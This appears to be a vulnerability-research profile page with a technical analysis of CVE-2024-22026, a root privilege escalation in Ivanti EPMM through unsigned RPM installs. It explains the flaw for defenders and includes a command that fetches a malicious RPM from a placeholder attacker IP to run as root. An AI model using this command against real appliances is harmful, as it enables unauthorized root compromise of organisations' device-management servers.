securekomodo (2)
Last Login: May 17, 2024
securekomodo's Latest (2) Contributions
Technical Analysis
CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.
The appliance uses the following command to fetch and install RPM packages as a low privilege user. This of course means you must have CLI access:
install rpm url <remote url>
This above command is only a CLI wrapper for the following to occur which runs as root
/bin/rpm -Uvh *.rpm
This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.
So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.
install rpm url http://<attacker_IP>/malicious.rpm
I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
Interesting, so based on this, and combining research from other firms like https://blog.assetnote.io/2023/07/21/citrix-CVE-2023-3519-analysis/, even if you are running an older version, if SAML is not enabled, you theoretically would not be vulnerable.
UPDATE – BishopFox has demonstrated SAML not required to exploit!